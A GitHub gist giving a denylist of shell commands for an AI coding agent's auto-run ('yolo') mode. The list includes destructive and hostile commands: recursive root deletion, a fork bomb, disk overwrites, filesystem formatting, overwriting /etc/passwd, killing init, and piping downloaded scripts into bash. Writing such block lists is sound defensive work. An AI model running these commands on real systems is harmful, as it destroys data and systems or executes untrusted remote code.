Skip to content

Instantly share code, notes, and snippets.

@paulwongx
Created April 18, 2025 16:29
Show Gist options
  • Save paulwongx/ae240e1ca7075c7230de1f5ef4b34f9a to your computer and use it in GitHub Desktop.
Save paulwongx/ae240e1ca7075c7230de1f5ef4b34f9a to your computer and use it in GitHub Desktop.
Cursor Yolo Mode CLI Denylist
rm -rf /
:(){ :|:&; };:
dd if=/dev/random of=/dev/sda
chmod -R 777 /
wget [malicious URL] O | bash
sudo rm -rf /*
mv ~ /dev/null
>~/.bash_history
curl [any URL] | bash
find / -type f -exec rm -f {} \;
mkfs.*
echo [malicious content] > /etc/passwd
kill -9 1
killall5
shutdown
reboot
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment